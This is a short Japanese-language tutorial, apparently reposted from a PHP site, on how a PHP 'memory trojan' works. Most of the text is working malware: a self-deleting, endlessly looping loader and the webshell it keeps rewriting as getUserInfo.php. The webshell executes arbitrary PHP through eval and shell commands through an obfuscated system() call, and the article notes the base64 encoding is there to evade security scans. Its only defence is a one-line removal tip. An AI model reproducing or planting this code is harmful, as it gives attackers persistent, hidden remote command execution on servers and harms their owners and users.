PHP メモリ トロイの木馬ウイルスの実装原理を分析します。

はじめに

メモリ トロイの木馬は、メモリ内で実行されるトロイの木馬ウイルスであり、コード エンティティはありません。メモリ トロイの木馬は、高度に隠蔽され、検出が難しく、殺すことができません (一般に不死の馬として知られています)。

ネットワーク セキュリティ業界には、強力なバレル効果があります。システムはブラックハットと戦い、その結果はセキュリティの最も弱い部分に依存します。ブラックハットとホワイトハットの勝敗は、攻撃のレベルと隠蔽と破壊のレベルによって異なります。

本文では、任意のファイルのアップロードやソースに近い攻撃によって悪意のあるコードが運用サーバーにアクセスできるようになったのかどうかについては説明していません。

ウイルス ソース コード (非常に単純)

<?php
//设置脚本不超时
set_time_limit(0);ignore_user_abort(true);
//删除文件本体
@unlink(__FILE__);
//给木马病毒起一个迷惑性的名字
$file = &#39;./getUserInfo.php&#39;;
//死循环常驻内存。释放木马文件
while(true) {
 if(! file_exists($file)) @file_put_contents($file, base64_decode(&#39;PD9waHAKaWYoJGUgPSBAJF9HRVRbJ2UnXSkgewogICAgJGZ1bmMgPSBAY3JlYXRlX2Z1bmN0aW9uKG51bGwsIGJhc2U2NF9kZWNvZGUoJ1pYWmhiQ2dpJykgLiAkZSAuIGJhc2U2NF9kZWNvZGUoJ0lpazcnKSk7CiAgICAkZnVuYygpOwp9CgppZigkcyA9IEAkX0dFVFsncyddKSB7CiAgICAkZiA9IHN0cl9yZXBsYWNlKCd4JywgJycsICd4eHhzeHh5eHN4eHh4eHh0eHhleHh4bXh4eHh4eHh4Jyk7CiAgICAkZigkcyk7Cn0=&#39;));
 sleep(60);
}

ウイルス本体を解放する

<?php
//以下代码实现了eval关键字和system函数的伪装
//eval($_GET[&#39;e&#39;]);
if($e = @$_GET[&#39;e&#39;]) {
    $func = @create_function(null, base64_decode(&#39;ZXZhbCgi&#39;) . $e . base64_decode(&#39;Iik7&#39;));
    $func();
}
//system($_GET[&#39;s&#39;]);
if($s = @$_GET[&#39;s&#39;]) {
    $f = str_replace(&#39;x&#39;, &#39;&#39;, &#39;xxxsxxyxsxxxxxxtxxexxxmxxxxxxxx&#39;);
    $f($s);
}

手順

• 上記の重要な機密コードは、さまざまなセキュリティ スキャンを回避するためにエンコードされています。

• ウイルス サンプルは実行されると、それ自体を削除し、メモリ内で長時間実行されます。

• リリースされたトロイの木馬が検出されて削除された場合でも、同じファイルが生成されます。

#解決策

プロセスを強制終了した後、リリースされたトロイの木馬ファイルを削除します。

推奨: 「

PHP ビデオ チュートリアル 」

以上がPHP メモリ トロイの木馬ウイルスの実装原理を分析します。の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。